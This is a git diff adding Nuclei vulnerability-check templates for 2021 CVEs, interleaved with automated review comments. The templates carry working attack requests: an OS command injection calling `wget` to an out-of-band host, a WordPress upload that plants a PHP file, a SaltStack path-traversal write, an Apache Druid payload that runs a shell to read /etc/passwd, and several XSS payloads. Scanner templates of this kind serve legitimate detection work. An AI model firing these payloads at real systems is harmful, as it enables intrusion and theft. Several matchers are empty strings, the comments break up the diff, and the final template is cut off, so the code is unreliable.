@@ -0,0 +1,63 @@ +id: CVE-2021-22502 + +info: + name: Micro Focus Operations Bridge Reporter - Remote Code Execution + author: pikpikcu + severity: critical + description: | + Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + remediation: | + Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability. + reference: + - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md + - https://softwaresupport.softwaregrp.com/doc/KM03775947 + - https://www.zerodayinitiative.com/advisories/ZDI-21-153/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-22502 + - https://www.zerodayinitiative.com/advisories/ZDI-21-154/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-22502 + cwe-id: CWE-78 + epss-score: 0.96129 + epss-percentile: 0.99354 + cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microfocus + product: operation_bridge_reporter + tags: cve,cve2021,microfocus,obr,rce,kev + +http: + - raw: + - | + POST /AdminService/urest/v1/LogonResource HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + + - type: word + part: body + words: + - "An error occurred" + - "AUTHENTICATION_FAILED" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 401 +# digest: 
4a0a0047304502205c37261d08f99c592bc5b850577bf00a9fad2b18dc5e65be14f5058863cc4090022100dfb6b7791625c23d24f5883edf3cddc8b3b822995b841fa480ceb3147a0796aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-23241.yaml b/nuclei-templates/CVE-2021/cve-2021-23241.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-23241.yaml rename to nuclei-templates/CVE-2021/cve-2021-23241.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24226.yaml b/nuclei-templates/CVE-2021/cve-2021-24226.yaml new file mode 100644 index 0000000000..80cb8fab90 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24226.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-24226 + +info: + name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage + author: dhiyaneshDK + severity: high + description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which + contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required. + reference: + - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24226 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-24226 + cwe-id: CWE-200 + tags: wordpress,cve,cve2021,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - '
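Review bot: In cve-2021-22502.yaml the `interactsh_protocol` matcher lists `http` and `dns` with no `condition`, which defaults to `or`, so a DNS lookup alone satisfies it. A lookup can come from anything that resolves the hostname out of the submitted JSON (a proxy or a log pipeline, for instance), and the other matchers (401, `AUTHENTICATION_FAILED`, `application/json`) are what any rejected login would presumably return. Keeping only `- "http"` gives evidence that the request came from the target; if DNS-only hits are kept deliberately for egress-filtered networks, a comment should say they are lower confidence. This is also the only template added in this range that uses the `http:` key where the others use `requests:`.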
' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2021/cve-2021-24284.yaml b/nuclei-templates/CVE-2021/cve-2021-24284.yaml new file mode 100644 index 0000000000..3f6dad51b2 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24284.yaml 
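Review bot: In cve-2021-24226.yaml the single request fetches `{{BaseURL}}` only, while the description says the dump appears on pages containing the `[accessally_order_form]` shortcode, so a site whose order form is not on the front page is reported clean. That limit should be stated next to the request, for example `# Checks the front page only; order-form pages elsewhere are not covered`. As the hunk reads here the body word is an empty or broken string, so the matcher text should be checked against the upstream template. The description also carries literal `\"` escapes around the file path.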
@@ -0,0 +1,71 @@ +id: CVE-2021-24284 + +info: + name: WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload + author: lamscun,pussycat0x,pdteam + severity: critical + description: | + WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. + reference: + - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 + - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 + - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ + - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ + - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24284 + cwe-id: CWE-434 + tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp + +variables: + zip_file: "{{to_lower(rand_text_alpha(6))}}" + php_file: "{{to_lower(rand_text_alpha(2))}}.php" + php_cmd: "" + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 + + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" + Content-Type: application/octet-stream + + 
{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fontsetname" + + {{zip_file}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="action" + + uploadFontIcon + --------------------------d3be34324392a708-- + + - | + GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" + + - type: word + part: body_2 + words: + - "phpinfo()" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/10/06 diff --git a/nuclei-templates/CVE-2021/cve-2021-24288.yaml b/nuclei-templates/CVE-2021/cve-2021-24288.yaml new file mode 100644 index 0000000000..03abba0392 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24288.yaml 
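Review bot: Nothing in the template removes the file that the first request unpacks under `wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/`, so every positive result leaves a `.php` file on the scanned site. The `intrusive` tag is present, but the `info:` block has no `remediation:` field and the description does not tell the operator that cleanup is needed. I would add `remediation: Remove the plugin and delete the directory this check creates under wp-content/uploads/kaswara/fonts_icon.`, which matches the Wordfence reference already listed. `php_cmd` shows as an empty string here, which may be a rendering loss, since the `body_2` matcher expects `phpinfo()`.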
@@ -0,0 +1,27 @@
+id: CVE-2021-24288
+
+info:
+ name: AcyMailing < 7.5.0 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully
+ go through with the subscription.
+ reference:
+ - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24288
+ cwe-id: CWE-601
+ tags: wordpress,cve,cve2021,redirect,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24298.yaml b/nuclei-templates/CVE-2021/cve-2021-24298.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24298.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24298.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-24316.yaml b/nuclei-templates/CVE-2021/cve-2021-24316.yaml
new file mode 100644
index 0000000000..710e42cee8
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-24316.yaml
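Review bot: The request in `path:` is not a read-only probe: per the description it completes a newsletter subscription, and it does so for `example@mail.com`, whose domain is a live mail provider rather than a reserved test domain. Each scanned AcyMailing site therefore gains a subscriber record and may send a confirmation mail to a third party. I would switch the address to a reserved domain, for example `user[email]=nuclei@example.com`, and add `intrusive` to `tags:` so the check can be excluded from scans that must not change state. The regex also has no boundary before `example\.com`, so a `Location` host such as `notexample.com` matches.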
@@ -0,0 +1,40 @@
+id: CVE-2021-24316
+
+info:
+ name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+ author: 0x_Akoko
+ severity: medium
+ description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+ reference:
+ - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
+ - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+ - https://www.wowthemes.net/themes/mediumish-wordpress/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24316
+ cwe-id: CWE-79
+ tags: cve,cve2021,mediumish,xss,wordpress
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "Sorry, no posts matched your criteria."
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24335.yaml b/nuclei-templates/CVE-2021/cve-2021-24335.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24335.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24335.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-24488.yaml b/nuclei-templates/CVE-2021/cve-2021-24488.yaml
new file mode 100644
index 0000000000..6ab0297b25
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-24488.yaml
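Review bot: The first entry under `words:` in the body matcher is shown as `""`, and an empty word is contained in every response, so as written the check reduces to the "Sorry, no posts matched your criteria." text plus status 200 and `text/html`, which any WordPress search without results satisfies. The reflected marker has probably been lost from this view (markup looks stripped across the page), but if the file really holds an empty string the matcher should carry the exact payload sent in `path:`, including `{{randstr}}`. The same empty or truncated words appear in cve-2021-24510.yaml, cve-2021-24926.yaml, cve-2021-25112.yaml, cve-2021-26247.yaml and cve-2021-28164.yaml. Separately, the `path:` value ends with a space before the closing quote, which should be dropped.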
@@ -0,0 +1,47 @@
+id: CVE-2021-24488
+
+info:
+ name: WordPress Post Grid <2.1.8 - Cross-Site Scripting
+ author: cckuailong
+ severity: medium
+ description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,
+ reference:
+ - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24488
+ cwe-id: CWE-79
+ tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'value="\"onmouseover=alert(document.domain)/">'
+ - 'Post Grid'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/nuclei-templates/CVE-2021/cve-2021-24510.yaml b/nuclei-templates/CVE-2021/cve-2021-24510.yaml
new file mode 100644
index 0000000000..37b803ab59
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-24510.yaml
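Review bot: The matcher block checks the reflected `value=` string and status 200 but not the response content type, unlike cve-2021-24510.yaml and cve-2021-25063.yaml in this commit, which also require `text/html` in the header. Without it a JSON or plain-text response that echoes the `keyword` parameter is reported as XSS although no browser would render it. I would add a third matcher with `part: header` and the word `"text/html"`; cve-2021-24926.yaml has the same gap. The `description:` also ends on a comma and reads "thesettings", so the sentence looks cut off.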
@@ -0,0 +1,48 @@
+id: CVE-2021-24510
+
+info:
+ name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDK
+ severity: medium
+ description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
+ reference:
+ - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24510
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24510
+ cwe-id: CWE-79
+ tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><" HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/nuclei-templates/CVE-2021/cve-2021-24926.yaml b/nuclei-templates/CVE-2021/cve-2021-24926.yaml
new file mode 100644
index 0000000000..c705851aa5
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-24926.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24926
+
+info:
+ name: WordPress Plugin Domain Check < 1.0.17 - XSS
+ author: cckuailong
+ severity: medium
+ description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
+ reference:
+ - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24926
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24926
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Domain Check"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2021/cve-2021-25033.yaml b/nuclei-templates/CVE-2021/cve-2021-25033.yaml
new file mode 100644
index 0000000000..f681ba8c96
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-25033.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-25033
+
+info:
+ name: Noptin < 1.6.5 - Open Redirect
+ author: dhiyaneshDk
+ severity: medium
+ description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue.
+ reference:
+ - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c
+ - https://plugins.trac.wordpress.org/changeset/2639592
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25033
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25033
+ cwe-id: CWE-601
+ tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,noptin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/04/13
diff --git a/nuclei-templates/CVE-2021/cve-2021-25063.yaml b/nuclei-templates/CVE-2021/cve-2021-25063.yaml
new file mode 100644
index 0000000000..48a654dc21
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-25063.yaml
@@ -0,0 +1,46 @@
+id: CVE-2021-25063
+
+info:
+ name: Contact Form 7 Skins <= 2.5.0 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
+ severity: medium
+ description: The plugin does not sanitise and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting
+ reference:
+ - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25063
+ cwe-id: CWE-79
+ tags: cve,cve2021wordpress,wp-plugin,xss,contactform,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "' type='hidden"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2021/cve-2021-25085.yaml b/nuclei-templates/CVE-2021/cve-2021-25085.yaml
new file mode 100644
index 0000000000..250ce81d36
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-25085.yaml
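Review bot: In `tags:` the comma between `cve2021` and `wordpress` is missing, which yields the single tag `cve2021wordpress`. Runs that select or exclude templates by `cve2021` or `wordpress` will skip this file without any error. The line should read `tags: cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated`.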
@@ -0,0 +1,42 @@
+id: CVE-2021-25085
+
+info:
+ name: WOOF WordPress plugin - Cross-Site Scripting
+ author: Maximus Decimus
+ severity: medium
+ description: |
+ The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.
+ reference:
+ - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90
+ - https://plugins.trac.wordpress.org/changeset/2648751
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25085
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25085
+ metadata:
+ verified: true
+ tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"additional_fields":[""]}'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by cs 06/21/2022
diff --git a/nuclei-templates/CVE-2021/cve-2021-25112.yaml b/nuclei-templates/CVE-2021/cve-2021-25112.yaml
new file mode 100644
index 0000000000..1705945685
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-25112.yaml
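Review bot: The `classification:` block has no `cwe-id`, although the other cross-site scripting templates in this part of the commit carry `cwe-id: CWE-79`. Reports that group findings by CWE will leave this one unclassified; add `cwe-id: CWE-79` after `cve-id`. cve-2021-26855.yaml is missing the field as well. The description says the value is reflected "in an admin page" while the request goes to `admin-ajax.php` with no login step, so the description should say whether authentication is needed.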
@@ -0,0 +1,51 @@
+id: CVE-2021-25112
+
+info:
+ name: WordPress WHMCS Bridge < 6.4b - Cross-Site Scripting
+ author: DhiyaneshDK
+ severity: medium
+ description: WordPress WHMCS Bridge < 6.4b is susceptible to authenticated reflected cross-site scripting because the plugin does not sanitize and escape the error parameter before outputting it back in admin dashboard.
+ reference:
+ - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
+ - https://plugins.trac.wordpress.org/changeset/2659751
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25112
+ cwe-id: CWE-79
+ tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/04/21
diff --git a/nuclei-templates/CVE-2021/cve-2021-25281.yaml b/nuclei-templates/CVE-2021/cve-2021-25281.yaml
new file mode 100644
index 0000000000..8a2c51684d
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-25281.yaml
@@ -0,0 +1,46 @@
+id: CVE-2021-25281
+
+info:
+ name: SaltStack Salt <3002.5 - Auth Bypass
+ author: madrobot
+ severity: critical
+ description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master.
+ reference:
+ - http://hackdig.com/02/hack-283902.htm
+ - https://dozer.nz/posts/saltapi-vulns
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25281
+ - https://github.com/saltstack/salt/releases
+ - https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-25281
+ cwe-id: CWE-287
+ tags: cve,cve2021,saltapi,rce,saltstack,unauth
+
+requests:
+ - raw:
+ - |
+ POST /run HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "return"
+ - "tag"
+ - "jid"
+ - "salt"
+ - "wheel"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/17
diff --git a/nuclei-templates/CVE-2021/cve-2021-25646.yaml b/nuclei-templates/CVE-2021/cve-2021-25646.yaml
new file mode 100644
index 0000000000..f5056c289a
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-25646.yaml
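Review bot: The request body calls `pillar_roots.write` with a traversal path, so on a vulnerable master the check creates `/tmp/testing` and leaves it there, yet `tags:` has no `intrusive` entry and the description does not mention the write. Scans configured to exclude state-changing templates will still run it. I would change the line to `tags: cve,cve2021,saltapi,rce,saltstack,unauth,intrusive` and add a `remediation:` field that names the fixed release given in the description (3002.5) and the leftover file. The matchers only confirm that the async job was accepted (`return`, `tag`, `jid`), not that the write happened, which deserves a comment next to them.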
@@ -0,0 +1,84 @@ +id: CVE-2021-25646 + +info: + name: Apache Druid RCE + author: pikpikcu + severity: high + description: | + Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. + Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. + reference: + - https://paper.seebug.org/1476/ + - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E + - http://www.openwall.com/lists/oss-security/2021/01/29/6 + - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-25646 + cwe-id: CWE-732 + tags: cve,cve2021,apache,rce,druid + +requests: + - raw: + - | + POST /druid/indexer/v1/sampler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"index", + "spec":{ + "ioConfig":{ + "type":"index", + "firehose":{ + "type":"local", + "baseDir":"/etc", + "filter":"passwd" + } + }, + "dataSchema":{ + "dataSource":"odgjxrrrePz", + "parser":{ + "parseSpec":{ + "format":"javascript", + "timestampSpec":{ + + }, + "dimensionsSpec":{ + + }, + "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", + "":{ + "enabled":"true" + } + } + } + } + }, + "samplerConfig":{ + "numRows":10 + } + } + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - 
